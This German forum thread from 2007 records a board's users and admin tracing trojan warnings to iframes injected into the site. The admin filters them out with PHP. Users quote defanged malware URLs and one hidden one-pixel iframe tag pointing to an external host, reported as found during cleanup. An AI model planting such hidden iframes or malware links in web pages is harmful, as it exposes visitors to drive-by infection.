Zitat (Doppelklick zum übernehmen) (Epi @ Fri, 16 March 2007, 19:03)
So, und beim Firefox hab ich dann Java deaktiviert und den Sun-Ordner komplett gelöscht,
danach passiert hier auf der Seite nichts.
Habs dann wieder aktiviert, zack kam die Warnung wieder und in der Statusleiste taucht
dann dieses auf


Ich kann nur dazu sagen, dass bei mir Java aktiviert ist rolleyes.gif

Wie schon weiter vorn mal erwähnt bin ich ebenfalls mit dem Firefox unterwegs und erhalte keine Warnung unsure.gif

Ich vermute mal, dass eure Firewall etwas zu "scharf" eingestellt ist

Andi


Geschrieben von: Guest am Sat, 17 March 2007, 00:36
Zitat (Doppelklick zum übernehmen)
Ich vermute mal, dass eure Firewall etwas zu "scharf" eingestellt ist


Aha...weil die Firewall zu scharf eingestellt ist, melden sich die Antivir Programme mit einer Trojaner Warnung :grübel
Das muss ich mal überdenken biggrin.gif

Bei mir besteht das Problem mit der Trojaner Warnung nach wie vor.
Der Herr Norton meldet sich grundsätzlich, wenn ich das MBL Board aufrufe.
Ich habe nur bei diesem Board den Ärger mit der Meldung.

IE6 und Norton Antivirus...........Norton Firewall ist nicht installiert laugh.gif

Guest

Geschrieben von: Epi am Sat, 17 March 2007, 02:50
Zitat (Doppelklick zum übernehmen) (Guest @ Fri, 16 March 2007, 21:53)
Ich kann nur dazu sagen, dass bei mir Java aktiviert ist  rolleyes.gif

Wie schon weiter vorn mal erwähnt bin ich ebenfalls mit dem Firefox unterwegs und erhalte keine Warnung  unsure.gif

Ich vermute mal, dass eure Firewall etwas zu "scharf" eingestellt ist 

Andi

Wie der Guest schon richtig festgestellt hat, die Warnung kommt vom Antiviren-Proggie und nicht von der FW...

Und fühl dich mal nicht zu sicher *g*
Ich hatte auch ne ganze Weile Ruhe und nu geht das wieder los gruebel.gif

Ich surfe im Übrigen gerade mit nem Laptop, der wegen einer Reparatur gerade frisch aufgesetzt wurde
und hier besteht das Problem genauso (Firefox, Antivir).

In der Java-Konsole ist übrigens dies hier zu finden:

Code (Doppelklick zum übernehmen)
Laden: Klasse BaaaaBaa.class nicht gefunden
java.lang.ClassNotFoundException: BaaaaBaa.class
at sun.applet.AppletClassLoader.findClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.applet.AppletClassLoader.loadClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.applet.AppletClassLoader.loadCode(Unknown Source)
at sun.applet.AppletPanel.createApplet(Unknown Source)
at sun.plugin.AppletViewer.createApplet(Unknown Source)
at sun.applet.AppletPanel.runLoader(Unknown Source)
at sun.applet.AppletPanel.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Caused by: java.io.IOException: open HTTP connection failed.
at sun.applet.AppletClassLoader.getBytes(Unknown Source)
at sun.applet.AppletClassLoader.access$100(Unknown Source)
at sun.applet.AppletClassLoader$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)


blink.gif

Ich guck mal in ein paar Stündchen in der Konsole auf meinem Computer nach,
ob da irgendwas aufschlussreiches steht...

Guts Nächtle smile.gif

Geschrieben von: hi leute am Sat, 17 March 2007, 03:22
smile.gif
also ich möchte kurz zu dem trojanerproblem etwas sagen, da ich sehr gerne diese seite besuche um mich zu informieren und den spaß bei den grillies mitzuerleben, bin also "silentreader" floet.gif

so langsam vermute ich das auf irgendeinen weg die ip dieser domain abgegriffen wird und bei aufruf dieser domain von entsprechenden seiten irgendwas an müll geladen wird. mit cc-comm... hatte ich bis gestern auch.

eben gerade wieder sprang mir die firewall (av ist meinst deaktiviert) ins gesicht und meckerte folgendes an, was im temp-ordner gespeichert und ausgeführt werden sollt freak.gif
rf802792592mm.exe

im ie-temp-ordner befand sich folgendes:
hxxp://surka.info/index.php?adv=17
hxxp://surka.info//files/exe.php?adv=17&spl=rds


das es mit der skypeonlineanzeige, was sid ansprach, zusammen hängen könnte kann ich natürlich nicht sagen, kanns mir aber auch schwer vorstellen, da dann sicher nicht alle sicherheitssysteme anspringen würden.

na wer weiß was da im hintergrund aktiv ist blink.gif

bis denne und gute nacht winke2.gif

Geschrieben von: Sidschei am Sat, 17 March 2007, 05:59
So viele Infos auf einen Schlag, und noch so drueh am Morgen zwinker.gif

Erstmal - auch wenn ich mit den komplett namenlosen Gaesten solangsam den Ueberblick verliere laugh.gif - meinen herzlichsten Dank an Euch alle fuer diese rege Teilnahme an der Fehlersuche thumbsup.gif respect.gif und ein Hallo an den stillen Leser winke.gif (die Grillianer beissen nicht floet.gif )

Also, ich versuch nun die ganzen Infos mal zu sortieren - wir sind nun deutlich einen Schritt weiter und nun kann man wohl zumindest sagen, dass das Problem wirklich hier ausgeloest wird. Das ist schon mal was, wie ich finde. Nicht unbedingt schoen (fuer uns) aber endlich ein Ansatz!

Ich hab den einen typen mal angeschrieben, auch schon weitere hilfe eingefordert yesnick.gif und hoffe, dass wir dann im Laufe der Zeit eine Loesung dafuer finden yesnick.gif

Epi:
Zitat (Doppelklick zum übernehmen)
Laden: Klasse BaaaaBaa.class nicht gefunden
Na, wenn er die Klasse nicht findet, ists ja erstmal auf gewisse Art und Weise gut yesnick.gif

Ansonsten wuerde ich Euch schlichtweg bitten, momentan JAVA zu DEAKTIVIEREN, dann seit ihr definitiv, soviel hab ich nun zwischenzeitlich beim Studium der Links durchaus kapiert, erstmal auf der sicheren Seite.

Ich halte auf dem Laufenden smile.gif

Geschrieben von: GreatWhite am Sat, 17 March 2007, 07:17
bigeyes.gif Uiiiii ist hier was los laugh.gif

@ Epi winke2.gif

Ja, ich hatte Java danach wieder eingeschaltet und es ist nix mehr "passiert". Aber nach der erneuten "Warnung" durch AntiVir vor einigen Tagen isser jetzt erstmal GANZ aus und logischerweise gibts seitdem auch keine Warnungen mehr !

Hoff ich doch mal laugh.gif

Greaty

Geschrieben von: GreatWhite am Sat, 17 March 2007, 07:17
bigeyes.gif Uiiiii ist hier was los laugh.gif

@ Epi winke2.gif

Ja, ich hatte Java danach wieder eingeschaltet und es ist nix mehr "passiert". Aber nach der erneuten "Warnung" durch AntiVir vor einigen Tagen isser jetzt erstmal GANZ aus und logischerweise gibts seitdem auch keine Warnungen mehr !

Hoff ich doch mal laugh.gif

Greaty

Geschrieben von: GreatWhite am Sat, 17 March 2007, 07:19
und mal wieder ein Doppelposting motz.gif

Sch.... F5 Taste......

Liegt aber auch bestimmt daran, das heute morgen noch zu "drueh" ist.

Zitat (Doppelklick zum übernehmen)
So viele Infos auf einen Schlag, und noch so drueh am Morgen


anon.gif Greaty

Geschrieben von: Sidschei am Sat, 17 March 2007, 07:43
iss es auch tongue.gif

also, ich such mich dumm und daemlich - aber ich kann keinerlei code-veraenderungen finden nixweiss.gif wenn da nicht ein fachmann auftaucht, hab ich irgendwie ein problem sad.gif

Geschrieben von: Sidschei am Sat, 17 March 2007, 08:28
So - ich finde die Ursache nicht kotz.gif Aber ich denke, ich konnte die "Wirkung" nun wenigstens unterbinden.

Das ist zwar absolut nicht fein und auch definitiv nicht sauber und endgueltig, aber fuer den Moment sollte es zumindest helfen, bis auch auch nur den Hauch einer Ahnung habe, was da ablaeuft.

Ich habe die Bitte - ich konnte ja nicht alle Seiten des Boards testen - wenn das Teil wieder auftaucht mir vor allem auch mitzuteilen, WO es aufgetaucht ist. Also, bei der Boarduebersicht, Beitrag editieren, PMs lesen... etcpp.

Ansonsten hoffe ich, dass es nun mal eingedaemmt, wenn auch sicherlich nicht geloest ist sad.gif

Geschrieben von: Epi am Sat, 17 March 2007, 09:57
Moin zusammen winke2.gif

Zitat (Doppelklick zum übernehmen)
Ja, ich hatte Java danach wieder eingeschaltet und es ist nix mehr "passiert". Aber nach der erneuten "Warnung" durch AntiVir vor einigen Tagen isser jetzt erstmal GANZ aus und logischerweise gibts seitdem auch keine Warnungen mehr !


Feigling tongue.gif No risk - no fun zwink.gif


Zitat (Doppelklick zum übernehmen)
Aber ich denke, ich konnte die "Wirkung" nun wenigstens unterbinden.


sad.gif Wie langweilig *g* Antivir muckt gar nicht mehr...

Der IE hatte heute morgen ne interessante Meldung, die ich mir aber leider nicht so schnell merken konnte (war auch bei mir noch zu drueh laugh.gif ) und nun weiss ich leider auch nicht, ob ich die irgendwo wieder aufstöbern kann. Lag aber vielleicht auch daran, dass du da gerade am werkeln warst? Da war auch überall MBL durch FCC ersetzt *g*

http://www.nukeboards.de/thema_zu_trojaner-trclassloaderg4-beim-besuch-meiner-seite_34675.html scheinen auch als Ansprechpartner gut zu sein...

Geschrieben von: Guest am Sat, 17 March 2007, 10:21
Zitat (Doppelklick zum übernehmen) (hi leute @ Sat, 17 March 2007, 03:22)
da ich sehr gerne diese seite besuche um mich zu informieren

es gibt ja doch mal Feedback a_woot.gif

Andi


Geschrieben von: Sidschei am Sat, 17 March 2007, 12:41
Zitat (Doppelklick zum übernehmen) (Epi @ Sat, 17 March 2007, 10:57)
Zitat (Doppelklick zum übernehmen)
Aber ich denke, ich konnte die "Wirkung" nun wenigstens unterbinden.


sad.gif Wie langweilig *g* Antivir muckt gar nicht mehr...


brick.gif tongue.gif

Zitat (Doppelklick zum übernehmen)
(war auch bei mir noch zu drueh  laugh.gif )


brick.gif brick.gif Sucht ihr um die Uhrzeit mal Fehler, von denen ihr keinerlei AHnung habt laugh.gif brick.gif

Zitat (Doppelklick zum übernehmen)
Lag aber vielleicht auch daran, dass du da gerade am werkeln warst? Da war auch überall MBL durch FCC ersetzt *g*


Hehe laugh.gif Ja, da bist du voll in der Zeit auf dem Board gewesen, wo ich im Code die Stelle gesucht hab, wo ich eingreifen muss/kann... laugh.gif gestestet hab ich das, indem ich MBL durch FCC ersetzt hab laugh.gif - Das war aber maximal 2 Minuten aktiv skeptisch.gif

so hab ich das Problem, um Euch "teilhaben zu lassen" auch momentan geloest. Ich entferne per PHP vor der Seitenausgabe (an den Browser) die iFrames, die tatsaechlich hier im Code vorhanden waren! Der Dank gebuehrt definitiv Dir Epi, deine gelungenen Hinweise und Recherchen haben dazu beigetragen, wenigstens den Grund mal zu finden. Ein dickes DANKE hierfuer! respect.gif

Zitat (Doppelklick zum übernehmen)
http://www.nukeboards.de/thema_zu_trojaner-trclassloaderg4-beim-besuch-meiner-seite_34675.html scheinen auch als Ansprechpartner gut zu sein...


ich hasse das motz.gif nirgends wird zB geschrieben, wie man das "Loch im ftp" schliessen kann gruebel.gif Ich wend mich auch mal an die, sobald ich den "FFF-Rausch" ausgeschlafen hab zahn.gif

sid

Geschrieben von: Epi am Sat, 17 March 2007, 14:22
Zitat (Doppelklick zum übernehmen) (Sidschei @ Sat, 17 March 2007, 12:41)
brick.gif tongue.gif

brick.gif brick.gif brick.gif


wife.gif

Zitat (Doppelklick zum übernehmen)
Hehe laugh.gif Ja, da bist du voll in der Zeit auf dem Board gewesen, wo ich im Code die Stelle gesucht hab, wo ich eingreifen muss/kann... laugh.gif gestestet hab ich das, indem ich MBL durch FCC ersetzt hab laugh.gif - Das war aber maximal 2 Minuten aktiv skeptisch.gif


Da war ich gerade aus dem Bett gekrabbelt und hab meinen Augen kaum getraut laugh.gif Gutes Timing, gell?

Zitat (Doppelklick zum übernehmen)
Ich entferne per PHP vor der Seitenausgabe (an den Browser) die iFrames, die tatsaechlich hier im Code vorhanden waren!


Hört sich genial an und funzt ja auch prima thumbsup.gif Und du willst keine Ahnung haben? *g*

Zitat (Doppelklick zum übernehmen)
Ein dickes DANKE hierfuer!


erroet.gif Aber gerne doch... Hat mir nen Heidenspass gemacht, endlich mal was los am Rechner freak.gif

Zitat (Doppelklick zum übernehmen)
ich hasse das motz.gif nirgends wird zB geschrieben, wie man das "Loch im ftp" schliessen kann


Das hat mich auch etwas verwundert, die scheinen alle ihr Wissen nicht gerne preiszugeben...


Ich hab jetzt mal in Richtung Invision Board gegoogelt... Kannste http://www.heise.de/security/news/meldung/72997 was anfangen? gruebel.gif Ist schon etwas älter, aber scheint ja in die Richtung zu gehen...

http://www.ipbsupport.de/board/index.php?showtopic=5410&hl= Von da aus gibt's dann nochmal weitere Links... Ist auf jeden Fall interessant, das zu lesen (auch wenn ich da nicht wirklich was kapiere *g*)

Geschrieben von: Sidschei am Sat, 17 March 2007, 15:22
Zitat (Doppelklick zum übernehmen) (Epi @ Sat, 17 March 2007, 15:22)
Zitat (Doppelklick zum übernehmen) (Sidschei @ Sat, 17 March 2007, 12:41)
brick.gif tongue.gif

brick.gif brick.gif brick.gif


wife.gif

Irgendwo muss ich doch meinen angestauten Frust durch den Murks loswerden tongue.gif DU warst halt gerade da laugh.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Das war aber maximal 2 Minuten aktiv skeptisch.gif

Da war ich gerade aus dem Bett gekrabbelt und hab meinen Augen kaum getraut laugh.gif Gutes Timing, gell?


Perfekt floet.gif - Irgendwie schaffts IMMER einer das Board zu besuchen, wenn ich gerade was rummach motz.gif tongue.gif - Und so viele Besucher haben wir ja nun auch nicht, weshalb ich mir das "Off-Setzen" immer spare. Passiert ja nichts, ausser dass evtl. ne Fehlermeldungen oder seltsame Anzeigen kommen icon22.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Ich entferne per PHP vor der Seitenausgabe (an den Browser) die iFrames, die tatsaechlich hier im Code vorhanden waren!

Hört sich genial an und funzt ja auch prima thumbsup.gif Und du willst keine Ahnung haben? *g*


Das ist ja was Anderes 1001.gif - Das hat mit der "Software" und deren "Programmierung" zu tun... und auch wenn ich vieles im Board noch immer nicht Blicke, schaff ichs doch wenigstens meistens die richtigen Stellen zum eingreifen zu finden smile.gif

Ich hab damit das Ursprungsproblem aber ja leider noch nicht geloest, denn prinzipiell haben wir in der Tat ein Problem auf dem ftp - auch wenn sich das nun erstmal nicht mehr auswirkt. Und da gehts nun an die "Technik" - Server, ftp und Co. sind absolut nicht meine Welt - um nicht zu sagen, da hab ich Null Ahnung und weiss vondaher auch absolut nicht, was ich machen soll oder machen koennte. Da bin ich schlichtweg auf Hilfe von Aussen meistens angewiesen. Aber nun ja, wenigstens steh ich dazu icon22.gif

Auch die Tatsache dass ich das nicht "selbst gefunden" habe zeugt ein wenig davon, dass mir das Thema einfach nicht so liegt nixweiss.gif Aber man muss nicht alles wissen kopfschuettel.gif - wichtig ist, die richtigen Leute zu haben/kennen thumbsup.gif


Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Ein dickes DANKE hierfuer!

erroet.gif Aber gerne doch... Hat mir nen Heidenspass gemacht, endlich mal was los am Rechner freak.gif


Ha laugh.gif Ich geb Dir bescheid, wenn's wieder Probleme zum loesen gibt freak.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
ich hasse das motz.gif nirgends wird zB geschrieben, wie man das "Loch im ftp" schliessen kann

Das hat mich auch etwas verwundert, die scheinen alle ihr Wissen nicht gerne preiszugeben...


Zum einen das ein beliebtes Problem im Net, zum anderen aber wohl auch die Tatsache, dass 99% der User mit den Erklaerungen nichts anfangen koennen - und sich auch nur fuer das Endergebnis interessieren sad.gif

Zitat (Doppelklick zum übernehmen)
Ich hab jetzt mal in Richtung Invision Board gegoogelt...  Kannste http://www.heise.de/security/news/meldung/72997 was anfangen?  gruebel.gif  Ist schon etwas älter, aber scheint ja in die Richtung zu gehen...


Da siehst'e mal - da bist du erfolgreicher als ich laugh.gif hab ich heute morgen auch gemacht - zwar massig das "Problem" gefunden, aber nichts sinnvoll verwertbares... die Meldung ist toll - im Negativen Sinne sad.gif Updaten wird verdammt schwierig, wegen der massenhaften Modifikationen am Board. SHIT!

Muss aber mal genauer schauen, ob das nicht evtl. die Sicherheitsluecken betrifft, die wir schon selbst "gestoppt" haben, wie das Massenhafte gespame.

Zitat (Doppelklick zum übernehmen)
http://www.ipbsupport.de/board/index.php?showtopic=5410&hl=  Von da aus gibt's dann nochmal weitere Links... Ist auf jeden Fall interessant, das zu lesen (auch wenn ich da nicht wirklich was kapiere *g*)


Auch hierfuer Danke smile.gif Die gehts wie mir - wirklich kapieren tu ich es auch nicht laugh.gif Aber SEHR INTERESSANTER LINK super.gif Da werd ich mich mal tiefer Einlesen, da koennten Loesungen drinstehen a_woot.gif - Aber nicht mehr heute, bin auf dem Sprung tongue.gif

Nun, ich dfinde das weniger Interessant - eher laestig laugh.gif - Hindert mich daran die Dinge zu tun, die ich eigentlich tun will - aber dass du die Links findest, nimmt mir schon viel Zeit ab. Danke nochmals smile.gif

Sid

Geschrieben von: hi leute am Sun, 18 March 2007, 02:28
sid, das was du da verbogen hast scheints ja gebracht zu haben respect.gif
nix mehr mit firewall meldungen auf der seite thumbsup.gif

auch wenn du sagst es ist nicht sauber gelöst, is doch null problem. ich programmiere selber sehr viel, und wenns irgendwo nicht so will wirds halt erstmal "hingefrickelt" bis eine bessere lösung in aussicht steht, ist glaub ich auch normal.

aber ich finds wirklich supi, so kann man wieder unbesorgt eure seite betretten smile.gif

danke dir und gutes nächtle an alle punk.gif

Geschrieben von: Epi am Sun, 18 March 2007, 12:52
Zitat (Doppelklick zum übernehmen) (Sidschei @ Sat, 17 March 2007, 15:22)
...Updaten wird verdammt schwierig, wegen der massenhaften Modifikationen am Board. SHIT!...

...aber dass du die Links findest, nimmt mir schon viel Zeit ab...

Hallo alle miteinander smile.gif

Ich geb es nu aber auch auf, da noch was zu finden. Leider scheitert alles daran, dass diese Version des Boards wohl nicht mehr supportet wird. Wenn ich denn was finde, ist das ab Version 1.3 sad.gif

Ansonsten find ich das sehr passend, was der Guest hi leute biggrin.gif geschrieben hat. Auch wenn da leider noch jemand Zugriff auf das Board hat, so haste demjenigen zumindest gehörig die Suppe versalzen mit deiner Lösung thumbsup.gif

Epi

Geschrieben von: Sidschei am Sun, 18 March 2007, 12:55
hi hi leute zahn.gif

danke fuer die Blumen - wenn ich was machen "kann", dann versuch ich natuerlich alles, das auch zu tun, keine Frage smile.gif Genauso wie ich im Gegenzug auch zugebe, dass ich einfach keinen Plan habe zahn.gif Du darfst bei der Danksagung aber "Efi" nicht vergessen kopfschuettel.gif Nur durch seinen gelungenen Einsatz war mein Handeln ueberhaupt moeglich yesnick.gif

Geschrieben von: Heby am Sun, 18 March 2007, 19:54
Der Heby meldet nun auch

Keinerlei Meldungen

jedenfalls im moment.

Danke für Eure Hilfe thumbsup.gif
denn nur so funktioniert ein Board

Heby

Geschrieben von: hi leute am Sun, 22 April 2007, 23:42
hallöchen winke2.gif
Zitat (Doppelklick zum übernehmen) (Heby)
Keinerlei Meldungen
jedenfalls im moment


es scheint sich wohl ausmomentet zu haben
eben gerad wieder springt die firewall an weil sich ein unding wie 176853.exe (die nummer variiert) ausführen will ohmy.gif

im quelltext der index findet sich ganz am ende auch folgendes
Code (Doppelklick zum übernehmen)
<iframe src="hxxp://lamerov-net.jino-net.ru/.../" width=1 height=1 style="display:none"></iframe>


sid, die arbeit ruft thumbsup.gif zwinkerms.gif

und einen schönen wochenanfang euch allen smile.gif

btw. funzt die registrierung nimmer? also bei mir werden weder im ie noch firefox die sicherheitscode bilder angezeigt blink.gif

Geschrieben von: Sidschei am Mon, 23 April 2007, 08:42
Zitat (Doppelklick zum übernehmen) (hi leute @ Mon, 23 April 2007, 00:42)
sid, die arbeit ruft thumbsup.gif zwinkerms.gif

Möööp... Zur Stelle zahn.gif Danke fuers Melden! Da ich kein Java aktiviert habe, hab ich das mal wieder nicht mitbekommen und als ich es das letzte mal gecheckt habe (was ich in (un)regelmaessigen Abstaenden mache) wars noch nicht da... und nun ists wieder weg.

Desweiteren zur Info: "Wir" laugh.gif floet.gif basteln gerade daran, eine neue Version des Boards zu installieren - nicht zuletzt wegen der Geschichte. Ich kann nicht sagen, wann das kommen wird, weil es einige Probleme bei der Uebernahme der DB gibt, aber ich denke sofern das Problem irgendwann mal geloest wird, dass es in (un zwinker.gif )absehbarer Zeit kommen wird smile.gif


Zitat (Doppelklick zum übernehmen)
und einen schönen wochenanfang euch allen smile.gif


Dir auch winke.gif

Zitat (Doppelklick zum übernehmen)
btw. funzt die registrierung nimmer? also bei mir werden weder im ie noch firefox die sicherheitscode bilder angezeigt blink.gif


Eigentlich sollte es funktionieren gruebel.gif Bist allerdings schon der zweite der sagt dass die Bilder nicht mehr angezeigt werden (wenn auch an anderer Stelle) so dass ich auch dem mal ein wenig nachgehen werde! ... Ergebnis folgt dann smile.gif

Geschrieben von: Sidschei am Tue, 24 April 2007, 17:29
wir vermuten bei dem Problem der Grafiken bei der Anmeldung ein Problem welches mit dem Serverumzug zusammenhaengt... denn selbst wenn man ein Board nagelneu installiert, besteht das Problem... Mal sehen was der HOster dazu sagen wird nun erstmal zwinker.gif

Wenn die Tage nichts dabei rauskommt, nehm ich die Code-Abfrage erstmal halt raus unsure.gif

Powered by Invision Power Board (http://www.invisionboard.com)
© 2002 Invision Power Services (http://www.invisionpower.com)